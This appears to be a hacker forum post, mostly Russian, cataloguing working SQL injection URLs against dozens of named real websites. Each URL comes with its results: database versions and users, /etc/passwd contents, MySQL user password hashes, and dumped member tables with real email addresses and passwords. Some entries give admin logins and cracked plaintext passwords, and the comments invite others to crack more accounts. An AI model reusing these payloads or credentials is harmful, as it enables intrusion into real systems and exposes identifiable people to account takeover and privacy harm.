http://www.pilotlondon.org/artists/details.php?id=79875543241+union+select+1,2,AES_DE CRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Datab ase(),0x3a,User(),0x3a),0x71),0x71),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32--&year=2007


Version: 4.1.18-nt
Database: pilotlondon
User: pilotlondon@localhost


http://www.craftproducers.com/festival-details.php?id=4+union+select+1,2,concat_ws(0x3a,v ersion(),user(),database()),4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27--


Database Version: 5.0.22
Database name: craftproducers
User name: craftadmin@localhost





PageRank - 6

http://www.libyaonline.com/music/artist.php?id=66876447987+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6--


Version: 4.1.22-standard
User: lol_lol@localhost
Database: lol_loldb

http://www.karenowa.ro/detalii.php?id=-175+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),da tabase(),useR()),5,6,7,8,9,10,11,12,13,14--


Database Version: 5.0.67-community
Database name: karenowa_karenowa
User name: karenowa_karenow@localhost


http://www.karenowa.ro/admin

admin:admin
dana:daniela

http://dvaction.northwestern.edu/categorybrowse.php?id=-4+union+select+1,2,3,4,concat(version(),0x3a,datab ase(),0x2a,user())/*
5.0.27:dvaction*ro@localhost

http://www.angelautoworld.com/adetails.php?AccID=-5+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7
user() : database() : version()
angelaut_angel@boscgi2004.eigbox.net : angelaut_angel : 5.0.51a-log

http://www.pensiuni-vile.ro/detaliu_spatiu.php?id=-229+union+select+concat_ws(0x3a,version(),database (),useR()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86--



Database Version: 4.1.22-standard-log
Database name: pensiuni_pens
User name: pensiuni_pens@localhost

http://www.jacksoncountyprosecutor.com/display.php?t=92+union+select+1,2,3,4,5,6,7,8,9,0, 1+limit+1,1/*

Database Version: 4.1.11-max-log
Database name: jacksonco
User name: jacksonco@66.39.201.146

http://www.nodak.edu/connectnd/print.php?sid=-822+and+0+union+select+1,2,concat(version(),0x3a,d atabase(),0x3a,user()),4,5,6,7,8/*

5.0.45-log:erp:cnderp@spider.ndsu.NoDak.edu

http://www.emagazines.com.my/adetails.php?aid=-33+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12
user() : database() : version()
ccne1_amer@67.15.97.31 : ccne1_emag : 5.0.67-log

http://www.emagazines.com.my/adetails.php?aid=-33+union+select+1,2,password,4,5,6,7,8,9,10,11,12+ from+tbl_user
Юзера подобрать не смог, если кто сможет - гоу в ПМ, отблагодарю +!

http://www.emagazines.com.my/adetails.php?aid=-33+union+select+1,2,concat_ws(0x3a,username,passwo rd),4,5,6,7,8,9,10,11,12+from+tbl_admin+limit+0,1� �евая табличка какая-то

http://www.turistka.ru/altai/news.php?n=24833+union+select+1,2,concat_ws(0x3A,v ersion(),database(),user()),4,5--

5.0.22:turistka:turistka@localhost

http://www.la-press.com/

http://www.la-press.com/journal.php?pa=description&journal_id=-1+union+select+1,2,concat_ws(0x3a3a,username,passw ord,email,admin,passkey),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31+from+user+limit+26,1--


Буржуйские дикликеры...

mtvernonlisbonsun.com

Database Version: 5.0.45-log
Database name: sunnews
User name: mvl@cgi0402.int.bizland.net

http://mtvernonlisbonsun.com/article.php?viewID=-34+union+Select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8,9,0,11,12--

file_priv Y

http://mtvernonlisbonsun.com/article.php?viewID=-34+union+Select+1,load_file(%27/etc/passwd%27),3,4,5,6,7,8,9,0,11,12--


sparklan.com

Database Version: 5.1.28-rc-community
Database name: sparklan_db
User name: root@localhost

http://sparklan.com/category.php?cat_id=-6+union+select+1,2,concat(table_name,0x3a,0x444154 413a,concat(user(),0x3a,version(),0x3a,database()) )+from+information_schema.tables--

c:\boot.ini
http://sparklan.com/category.php?cat_id=-6+union+select+1,2,load_file(0x433a5c5c626f6f742e6 96e69)--

http://www.dhammaweb.net/dhamma_news/view.php?id=129/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/LIMIT/**/1,1/*

Database Version: 4.0.27-max-log
Database name: dhamma_news
User name: dhamma_news@64.202.166.236

http://www.itp.net/grouptests/details.php?id=29&prodid=280986543150+union+select+1,2,concat_ws(0x3 a,version(),user(),database()),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50--


Database Version: 5.0.45-log
Database name: itp
User name: itpuser@192.168.1.246


http://www.itp.net/grouptests/details.php?id=29&prodid=280986543150+union+select+1,2,concat_ws(0x3 a,user,password),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0+from+mysql.user--

root : *25D34EC64807BC5831F8C16DE5E2A2200D58AAA1
itp_openx : *14E3B1F4ACEAD4570424050CA8583A5D4D302948
itpuser : *F1D85A0CC85F8EB1E5A1C843B8D7ACE3C014950C
ahlan : *F1D85A0CC85F8EB1E5A1C843B8D7ACE3C014950C
nisal_bandara : *166D3A614724444A17B7DD785888DD2E3D2FFCD7
dbman : *FF605D21500AFAD1237A677D327C8D8B24C4167C
openads : *7C187D3451A485A57E2DB735182C576D2FE2CF60
nluser : *874AF3EC5C6B73D4D089F26DC87D0FAC185F12A1
walid_yousef : *AF91323B44ADB6CD39CB6245E00A0BA937116C1C
hitesh_uchil : *6038C6B0D915DEAA9E0C8B3C9B0A0DA152FDDD42
vinod_alath : *0594BC993B5E1FDE75BFE43CECBED466F235536E
tahseen_khatib : *1FCF938D3560BB0D8B052493888BE9BDD73F7448
meghna_jalnawall : *1AA9BBE09AB401F46A2A86381D7035880CDCC7A8
itpnet : *F1D85A0CC85F8EB1E5A1C843B8D7ACE3C014950C
ab : *F1D85A0CC85F8EB1E5A1C843B8D7ACE3C014950C
kavitha_r : *C432A633B245E22806FAD27582EA5D4E4C2096FA
anil_tejwani : *20DBA518D1F6B7B5049FDCF8189F398433940EC0
adminuser : *90862F972500CE38599616C8300B537CBF13CB20
jonathan : *B78F516C54346976EF5DC51F1F110D4BD6A45551
sphinx : *5B18B7C9DAF71DB1564C6F2D0285F898A656A99A
mysqlar : *1EF61F6BA99933AF1B973B908C556568F0E02C50
cactiuser : *91204ED06D1FE7E3E9A03EED23BAEBBEE3AD8DF7
blogs : *7F125EC78B009BD5BDF542FB78AE399340D9192A
conservus : *3E11C26BEEC2FB47282874CAF491CD6ACD5F4474
omer_larzi : *331D537F2875935580F9A2DF94DD071A336FB430
anju_raj : *B2351D25CBD54F89985A9BA50742B49E198B9AE1
syed_rahim : *F1BC2D41E4126119294F8379D31C0D9CE5E13DEE
limesurvey : *467885DE1212449090A82D3543A6695BE6578972
nishchint : *13A3F2CE37C938CBFF56D278F94394BF06D59EA5
timeout : *F1D85A0CC85F8EB1E5A1C843B8D7ACE3C014950C
openx : *E0DE22DCE5BBBC84FFCB8CDE8DD1B0087BFC4F33
carme : *D43457B6F6D766558F443B323F5E0C2C015465F9
carme_openx : *A96D5F5F8C5987ECEE7486E06290D9477FD7633E
ahmer_ansari : *64E9C1D513C436D59BD0FDA737FA58D1EFE5C4D8
repl_dynamic1 : *144B5C1F66334E0C6667777A238AE80A267DA1C0
backup : *ECB644BA18F94C4A5445E70CDD4C72A86B176053
cwo : *D15B0A04577B1E9B8069295D9929E71F62A8CAE0
proftpd : *79F2AA5FDC76101463392E4338A96E6FBC93D751

http://www.idealtour.ro/detalii_print.php?id=-98+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20--



Database Version: 5.0.67-community
Database name: ltour_idealtour
User name: ltour@localhost

Какие ребята на просторах интернета.Фирма-то хорошая Codemasters.

Такие красивые игрули делают оч нравится.

http://au.codemasters.com/news/?showarticle=1465476598762103/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())/*


Database Version: 4.1.20-log
Database name: codem
User name: codiesforum@l360a.codemasters.com.dock


Достаём крутых дядей лимитом -)

http://au.codemasters.com/news/?showarticle=1465476598762103/**/UNION/**/SELECT/**/CONCAT(0x3a,(SELECT/**/CONCAT(password,0x3a,user)/**/FROM/**/mysql.user/**/LIMIT/**/1,1),0x3a)/*


::root
::
::
:5283f24030a7f0a4: codiesforum
:5283f24030a7f0a4: codiesforum
:5283f24030a7f0a4: codiesforum
:5283f24030a7f0a4: codiesforum
:5283f24030a7f0a4: codiesforum
:5283f24030a7f0a4: codiesforum
:28882517462b220b: replisync
:593da7b347470371: alex.speed
:4442781618168588: lee.ward
:372cbec53680c5f7: nick.mcauliffe
:5736f905475c8a70: nicholas.johnson
:0ff736f0738db01a: cmdbuser
:0ff736f0738db01a: cmdbuser
:0ff736f0738db01a: cmdbuser
:0ff736f0738db01a: cmdbuser
:49e6d7a6062ce348: emmazambonini
:34aab62f434104fa: dan.yaxley
:2a16ff2b07d85e61: urchin
:19e291892ee911fc: jumpgate
:19e291892ee911fc: jumpgate
:09911db023666d81: jumpgate
:19e291892ee911fc: jumpgate
:0ff736f0738db01a: cmdbuser
:5283f24030a7f0a4: codiesforum
:74b7406735ab1d51: dan.yaxley
:6eb64cb93755c485: cmrepl
:3132aa414006eee9: james.merrix

http://www.anke-firlefanz.de/adetails.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44
user() : database() : version()
dbo117112158@212.227.118.16 : db117112158 : 4.0.27-max-log
mysql,information_schema - нет доступа

http://www.f64.ro/stiri_detail.php?id=-46+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9,10,11,12,13,14



Database Version: 4.1.22-standard-log
Database name: f64_f64
User name: f64_ro@localhost

http://www.tagderkueche.de/presse/adetails.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6
user() : database() : version()
amk@62.144.112.203 : amk_tdk : 4.0.17-nt

http://www.ssrnetwork.net/events/details.php?id=227098097544+union+select+1,concat_ ws(0x3a,version(),user(),database()),3,4,5,6,7,8--

Database Version: 5.0.27-community-nt
Database name: gfnssr_new
User name: gfnssr_user@localhost


Первая десятка юзеров с базы gfnssr_new ...


memberID : username : member_password : security_level


http://www.ssrnetwork.net/events/details.php?id=227098097544+UNION+SELECT+1,CONCAT( 0x3a,(SELECT+CONCAT(memberID,0x3a,username,0x3a,me mber_password,0x3a,security_level)+FROM+gfnssr_new .members+LIMIT+10,1),0x3a),3,4,5,6,7,8--

:65: gov@ssrnetwork.net :53db2b013dbcdd448c0d467753c3f7e1:1
:37: 325brown@armymail.mod.uk :95575fc8f27788dd812517cc5d7829a2:2
:12: A.C.Welby@bham.ac.uk :9e9a9a8cbc80841375b54b39bad1f3a3:2
:13: p.b.jackson@bham.ac.uk :7ea4f1ba7e256e3c:2
:36: pip@newsunmedia.com :34b97d46c84777200dcd3640788d51ee:2
:35: b.c.kelly@bham.ac.uk :5ef9dce3b12315f3afa483a9bf275823:2
:38: M-White@dfid.gov.uk : c0566ecb4cd3c71cc2156a0c625bfd25:2
:39: g3ssr-so3@land.mod.uk :0c4010334a0bc8f6b36dada03a728275:2
:40: ben.kelly@ssrnetwork.net :1bfc947b3277c2ddc925b5aeb8f1216a:2
:41: shiv.bakrania@ssrnetwork.net :09bf3f6a7afa1d5666cf329c626d085c:2
:42: philip@iedesign.co.uk : 7302c67f811efc9c2aafef570601472e:2




Первая десятка юзеров с базы contact

http://www.ssrnetwork.net/events/details.php?id=227098097544+UNION+SELECT+1,CONCAT( 0x3a,(SELECT+CONCAT(user_login,0x3a,user_password, 0x3a,email,0x3a,admin)+FROM+contacts.users+LIMIT+1 0,1),0x3a),3,4,5,6,7,8--


user_login : user_password : email : admin

: tim@iedesign.co.uk :56983fe737c43c8a: tim@iedesign.co.uk:1
: oliverw@iedesign.co.uk :2cae020e37e4fa8b: oliverw@iedesign.co.uk:1
: b.c.kelly@bham.ac.uk :13148a3b56f2b99c: b.c.kelly@bham.ac.uk:1
: shiv.bakrania@ssrnetwork.net :6d43ed41307ee6f7: shiv.bakrania@ssrnetwork.net:0
: ben.kelly@ssrnetwork.net :050700543e38bc5e: ben.kelly@ssrnetwork.net:0
: paul.jackson@ssrnetwork.net :0243d2b3255d7a2d: paul.jackson@ssrnetwork.net:0
: axp878@bham.ac.uk :207cc12166940fee: axp878@bham.ac.uk:0
: mxs842@bham.ac.uk :4d53087849cf0d41: mxs842@bham.ac.uk:0
: a.c.welby@bham.ac.uk :5e7bfa8b6fc49936: a.c.welby@bham.ac.uk:0
: t.j.carney@bham.ac.uk :2d43b3ae054691b3: t.j.carney@bham.ac.uk:0

http://www.rosinox-laser.ru/news/news_archives/?id=-1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4,5--

Database Version : 5.0.45-log
Database name : u91525_2
User name : :u91525@10.10.12.156

админ :

http://www.rosinox-laser.ru/news/news_archives/?id=-1+union+select+1,2,3,concat_ws(0x3a,login,pwd,deny Access),5+from+bezanti _users+limit+1,1--

admin:21232f297a57a5a743894a0e4a801fc3

http://www.accordgrup.ro/produse-detalii.php?id=-11+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),useR()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19&meniu=&ex=&lb=ro


Database Version: 5.0.37
Database name: accordgrup
User name: accordgrup@localhost

http://www.weissprofil.ro/produse.php?id=-29+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5


Database Version: 5.0.45-log
Database name: weissprofil
User name: weissprofil@core3.hostbase.net


http://www.wert.ro/lucrari.php?d=5&f=-13+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7&lb=en&p=1


Database Version: 5.0.24a-Debian_9
Database name: wert
User name: wert@localhost


http://www.metroplex.ro/produse.php?ct=-4+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4&t=p#15


Database Version: 5.0.45-log
Database name: metroplex
User name: metroplex@core3.hostbase.net

http://www.valromexim.ro/produse-detalii.php?id=-24+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),useR()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27--


Database Version: 5.0.45-log
Database name: valromexim
User name: valromexim@core3.hostbase.net

http://www.mementomori.ro/produse-detalii.php?id=-1443+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),useR()),7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29

Database Version: 5.0.22
Database name: mementomori
User name: mementomori@localhost

http://www.dpnet.ro/produse-detalii.php?id=-76+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),useR()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--


Database Version: 5.0.67-community
Database name: rdpn0104_dpnet
User name: rdpn0104_dpnet@localhost

http://www.arm-52.ru/news/?id=-30+union+Select+1,2,3,4,5,6,7,8--

Database Version: 4.0.25
Database name: autorynok
User name: autorynok@localhost


http://pro-technologies.ru/news/?id=-30+union+select+1,2,3,4,5,6--

Database Version: 4.1.22-log
Database name: wwwprotechnologi
User name: protechn@localhost

http://www.hs-ships.ru/new.phtm?i=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5--

Database Version : 4.1.22-WWW
Database name : flot_search
User name : flot@localhost

http://www.bezanti.ru/news/?id=-30+union+select+1,2,3,4,5--

Database Version: 5.0.45-log
Database name: u91998
User name: u91998@10.10.12.156


admin:c4ca4238a0b923820dcc509a6f75849b ~ 1
keeper:c4ca4238a0b923820dcc509a6f75849b ~ 1
леночка:f66786da44fda0a3fff3596281989647 ~ 20062003
абакан:c7736e57315df784b4f7094019fc13be ~ antares
Алексей:153c4797e9d1f5010b2ceb71f3160223 ~ ??
user:c7736e57315df784b4f7094019fc13be ~ antares
antares:827ccb0eea8a706c4c34a16891f84e7b ~ 12345
luba:405e28906322882c5be9b4b27f4c35fd ~ 1978

http://www.preciseconsult.net/show.php?id=-11+union+select+1,2,3,4,5,6,7,8--

Database Version: 5.0.67-community
Database name: precisec_pbc
User name: precisec_pbc@localhost

Login: admin
Pass: PbCaDmInCmS

PM Team
http://www.pmteam.ru/blogs/?id=20+union+select+1,2,3,concat(version(),0x3a,us er(),0x3a,database())/*
user(): wwwpmteamru
database(): pmteam01@localhost
version(): 4.1.22-log
тИЦ=20
PR=4

table users
http://www.pmteam.ru/blogs/?id=20+union+select+1,concat(id,0x3a,login,0x3a,pa ssword),3,4+from+users/*
20:mart:aprel
13:Admin:qweasd
14:emorgun:1234567
9:SFilippenko:figvam
22:SVN:bwdm604
15:ekaterina:4979408
ООО Издательский дом ВИАМ
http://www.viam.spb.ru/cont/cont_paper.php?id=20'+union+select+1,2,3,concat(ve rsion(),0x3a,user(),0x3a,database()),5,6,7/*
user(): viam
database(): viam@localhost
version(): 4.0.27-log

тИЦ=100
PR=4

AFPC
http://www.afpc-cartes.com/actus.php?id=20+union+select+1,2,3,4,5,6,7,concat( version(),0x3a,user(),0x3a,database()),9,10,11,12, 13--
user(): afpc
database(): afpc2005@localhost
version(): 4.0.24_Debian-10sarge2-log

PR=4

http://animassacre.com/news.php?id=-41+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),useR())


Database Version: 5.0.51a-community
Database name: juck_animassasite
User name: juck_animassaani@localhost

http://www.spb-online.ru/news.php?id=12+UNION+SELECT+1,concat_ws(0x3a,versi on(),database(),user()),3,4+LIMIT+1,1/*

Database Version: 4.1.25
Database name: spbonline_spb
User name: spbonline_spb@localhost


http://www.ringator.ru/cat.php?p=37'+UNION+SELECT+1,AES_DECRYPT(AES_ENCRY PT(concat(version(),database(),user()),0x71),0x71) +LIMIT+1,1/*

Database Version: 4.1.13
Database name: geeload_ringator
User name: geeload_ringator@localhost

Pagerank: 6

http://www.seenews.com/_c/SaveAs.php?Id=-137535+UNION+SELECT+1,concat_ws(0x3a,version(),dat abase(),useR()),3,4,5,6&Type=3


Database Version: 5.1.16-beta-Debian_3-log
Database name: SeeNewsUTF
User name: root@localhost

http://www.seenews.com/_c/SaveAs.php?Id=-137535+UNION+SELECT+1,load_file(0x2f6574632f706173 737764),3,4,5,6&Type=3

root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shDebian-exim:x:100:102::/var/spool/exim4:/bin/falsestatd:x:101:65534::/var/lib/nfs:/bin/falseidentd:x:102:65534::/var/run/identd:/bin/falseit:x:1000:1000:it,,,:/home/it:/bin/bashsshd:x:103:65534::/var/run/sshd:/usr/sbin/nologinmysql:x:104:104:MySQL Server,,,:/var/lib/mysql:/bin/falsepublisher:x:1001:33:SeeNews Publisher,,,:/var/publisher/:/bin/bashbacula:x:105:105:Bacula:/var/lib/bacula:/bin/false

интересная скуля по моему мнению, так как вывод информации из БД осуществляется в открывающимся документе ворд... для меня это было что то новое.

http://reverans.info/index.php?action=news&id=-1+union+select+1,2,3--

Database Version: 5.0.75-percona-highperf-b11-log
Database name: a6659_reverans
User name: a6659_reverans@94.103.80.170

Login: admin
Pass: 12345


http://mgauto.ru/main.php?page=news&id=-1+union+select+1,2,3,4,5,6,7--


Database Version: 5.0.67-log
Database name: u94915_bestfas
User name: u94915@10.10.223.241

Login: root
Pass: privetArena


http://www.avkgroup.ru/?m=news&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,version( )))),3,4,5,6--

Database Version: 5.0.67-log
Database name: u47054
User name: u47054@10.10.223.209

Login: admin
Pass: 3ceaf5c5abed0963e3e1be7fa91cf8d9 : 6164707


http://www.imc.com.jo/news.php?id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

Database Version: 5.0.45-log
Database name: imcjordan
User name: imcjordan@76.12.91.164

Email: Fnijem@imc.com.jo
Pass: fadi2008

http://www.speccars.ru/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

Database Version : 4.1.22-log
Database name : speccar4_sdbase
User name : speccar4_suser@localhost

http://animassacre.com/news.php?id=-41+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user())

http://syslinks.arsmedium-ag.de/view_group.php?id=-1+union+select+
0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0 +FROM+apb_users--

username:wolff
password: 27E1FmimyJ7mY

http://syslinks.arsmedium-ag.de/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,user(),version(),database()) ,0,0,0,0,0+FROM+apb_users--
user:apb@localhost
version:4.1.25
database:ars_apb







http://www.ocotlan.gob.mx/noticias.php?Id=-1+union+select+0,concat_ws
(0x3a3a20,version(),user(),database()),2,3,4,5,6,7 ,8

user:ocotlan_portal@localhost
version:5.0.67-community
database:ocotlan_portal

http://www.ocotlan.gob.mx/noticias.php?
Id=-1+union+select+0,password,2,3,4,5,6,7,8+from
+usuarios--
password: secureLog01

http://www.poplavok.info/index.php?mod=article&act=art&id=-6+union+select+1,2,3,4,5/*
4.1.22-standard

http://sjaschool.org/news_calendar/news_archives.php?id=-100+union+select+1,version(),database(),4,5,6,7/*

4.0.24-standard
sja_site

Info Security Adviser
http://www.infosecurityadviser.com/view_message?id=-21+union+select+1,2,3,4,5,concat(version(),0x3a,da tabase(),user()),7,8/*

user(): miniTao_Reed
database(): taobase@localhost
version(): 5.0.37-log

PR=4

http://www.infosecurityadviser.com/view_message?id=-21+union+select+1,2,3,4,5,table_name,7,8+from+info rmation_schema.tables+limit+0,1/*

читаем таблицы.. ~170

иностранный датинг. окло 50к юзеров+пхпбб-форум.

http://tv.mylol.net/?chan=345345345345345%20UNION%20SELECT%2044444,555 55,66666,77777,88888,99999,33333,email,5%20FROM%20 lol_users%20where%20id=4400

http://www.nicepeople.ru/article.php?action=showarticle&id=-1+union+select+1,2,3,concat_ws(0x3a3a,version(),us er(),database()),5,6,7,8,9

http://www.7days.ae/storydetails.php?id=-74984'+union+select+1,2,3,4,5,6,concat_ws(0x3a,use r(),database(),version()),8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4+--+
user(): sevendaysdb@localhost
database(): sevendaysdb
version(): 5.0.45
PR: 6
---------------------------------------------------
http://www.dimensionextreme.com/newspopup.php?id=-38'+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9/*
user(): dimextreme@localhost
database(): test
version(): 4.1.20
PR: 4
---------------------------------------------------
http://www.autosport.com/news/report.php/id/973525' union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version ()),7,8,9,0,1,2,3,4,5,6,7,8,'a
user(): autosport@192.168.2.252
database(): autosport
version(): 5.0.27-standard-log
PR: 6

http://www.abtrack.it/pagina.php?p=news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10--

Database Version: 5.0.68-log
Database name: Sql211120_1
User name: Sql211120@62.149.141.93



admin:9e817de2f9afff78d03f8b49f1fb920d

a.bacchin@albait.com:a113710b4eafa4c5482123a55d244 bb4

allevi@allix.it:ceed60763b5891b3a88277b7b40330c4

danijel.primozic@gmail.com:d980db36a9667ca518de3d7 dd4190d72

dpangallo@divitech.it:0949fd5c7d3d8eca089e7f58a9ed 00b6

fabrizio.ravazzano@thinksoft.i:c014c464bb0b6b680a2 4ab8708b96075

festa.francesco@memo service.c:2e80eb6090aa91ba6647fa03e6cfef0e

i.golob@abtrack.it:f57039f0a0a70592d2586ea44aa3388 6

igor.skorjanc@gmail.com:dd97813dd40be87559aaefed64 2c3fbb

l.bresciani@abtrack.it:7130857e6277c4d1444be88c5da 1bd29

nico@multicap.be:e660710b822ceeaf54016c59b441133a

abtrak@biax.org:1346037476b33cabfff2fe21c94f281a

s.assi@abtrack.it:0c74ac34d6652b2da30488d4f38496d8

salvatore.desimone@ocem.com:05aab7caf9d70adb9bea66 37489ce412

solda@adelsrl.it:1d7364f4a24cfbbbef836d8276c7ccb2

http://www.rus-plotnik.ru/articles/?prod_id=-379+union+select+1,2,3,4,5,6,7--

Database Version: 5.0.67-log
Database name: rusplotnik
User name: rusplotnik@localhost

Тиц 60
PR 3

Админа не нашёл =\

http://norbic.org/events/detail.php?eid=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16
user() : database() : version()
norbicweb@72.167.232.156 : norbicweb : 4.1.22-max-log